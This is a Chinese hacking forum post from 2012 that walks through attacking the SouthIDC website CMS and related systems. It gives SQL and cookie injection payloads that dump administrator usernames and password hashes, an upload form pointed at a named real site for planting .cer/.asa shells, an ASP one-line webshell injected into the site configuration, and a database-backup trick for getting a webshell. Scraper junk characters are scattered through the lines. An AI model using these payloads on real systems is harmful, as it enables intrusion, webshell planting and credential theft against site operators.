找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2343|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb
5 N5 s; J% M% L' ~/ J% X. h1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 : I* ^% _& N7 i/ B- x' x8 A
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
6 P+ A0 l& s; D直接暴管理员帐号密码(md5)9 B9 e6 D+ d1 @. _. e2 H6 h! ]
2.登陆后台
$ a/ L, C9 }1 S9 T3.利用编辑器上传:2 h- x& ~- B! D; j  @  j# L
访问admin/southidceditor/admin_style.asp" V3 r$ Y; b' Y) V
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.' q, F. T7 A, u

4 M; P+ D" |  C0 X4 C========================================
, L6 E- q2 v" Z& i5 k) Q! W9 ]) o2 z" G
参考资料整理:' A! r6 m1 V. C- g* g% Z
南方数据、良精系统、网软天下漏洞利用7 X' \3 K9 \: t. Z1 R: c# P4 F

, y  Y: g) I4 c1、通过upfile_other.asp漏洞文件直接取SHELL
  o  M0 u: U: y( t直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
& h8 G' i8 q4 _$ e6 D<HTML><HEAD> 5 H. R5 _, u: r7 K
<META http-equiv=Content-Type content="text/html; charset=gb2312"> . j5 w' O" \$ ~, c" g( _1 i) W
<STYLE type=text/css>BODY {
" c3 M2 ^2 |* |8 h2 l0 w. gFONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee 9 {8 Q& R' C: T9 s
} - Z! R! I- c+ C0 D( A) e: z, R1 D
.tx1 { 4 X. r0 }+ o4 x" `5 G
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
- s5 ?8 B8 L9 u& T* |$ Z}
3 n5 W  S* M$ }* s2 L/ E</STYLE>% q* \2 f2 s& g: g$ p! m
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
$ K. {- b8 _6 I+ V  K$ U% s* Y2 k; M<BODY leftMargin=0 topMargin=0>
2 r8 v, _2 ]! E2 h5 W<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post
# [! A0 h; y5 N' j8 fencType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> 0 ^% K' J' W- m
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>& b: A2 ]- M$ G  d0 `2 Y5 E* U

9 c" S8 n, I. c' U将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。6 p2 X& h, u9 x& A1 S# e& r) V# H, p
注:此方法通杀南方数据、良精系统、网软天下等- T' N. E5 t1 j; t. T' o4 f
! P  E- t* a8 p" ~6 P/ z; B
2、通过注入秒杀管理员帐号密码,使用如下:
5 R# I0 o+ L5 ~5 l; D. v4 i5 S( Vhttp://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’
' \; _+ T( M+ _' C以上代码直接暴管理员帐号和密码,取SHELL方法如下:
; D) e7 E* ?* F: S2 Q! j在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’
/ f! P. j+ K/ |0 }成功把shell写入http://www.target.com/inc/config.asp" A( Z2 ?9 g8 y) H
这里一句话chr(32)密码是“#”& G% v0 ]! F. I9 q6 K
3、cookie注入
, p3 {7 d, M* ]4 j9 v清空地址栏,利用union语句来注入,提交:
4 Z) I3 ~8 w! W3 i5 K- kjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
" ^$ {. [2 v- o) U* V如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?& d7 o, M5 {$ Y& ^& ?
注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
  ^0 O- n! M$ W5 B(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)
4 x! j# _* Z5 h8 q( o0 T; [: Z0 U- v+ h" C3 Y7 e! X
三、后台取SHELL方法总结
! o5 s; k( F" P% g. `$ f(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:
8 X2 N8 e7 D8 y7 g( s1 {然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,
( X+ P; @2 l5 L, M$ y8 g' x9 v0 ^6 f, x0 M这时再打开一句话马的客户端,提交同样得到一个小马
4 z- R: ]1 S" P+ n6 a5 n; V+ J  e' }(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)  G0 q% N) j. O3 g
(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:7 }" u! R* T% N, e3 p( i8 X
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then: e2 l- F- k$ r" ]
EnableUpload=false
8 {, e" g0 S- F. m+ ?
% s$ v6 R4 V, d+ qend if
6 L6 \7 _) ]4 |& h6 k+ Eif EnableUpload=false then
3 a7 A! |  ~! `$ d, kmsg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
8 K6 M* l# J. W8 ?; a6 `1 ~FoundErr=true
5 b5 D" u; d8 h  zend if) \+ b4 B8 y# Y9 k/ W# G% f- t
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:# n! |9 p% C8 X6 T) r; y# W) |, W
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)  }" t! b# k8 U2 u  M' v
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的
1 H3 T; r4 P& `9 x) L! T9 u! C  B
4 L1 {% `( P! w3 S% V点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的
: ?+ M; {! r" V0 R6 c3 t直接访问备份后的地址,就得到一个webshell  F( _; {, d% B4 ^+ e
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表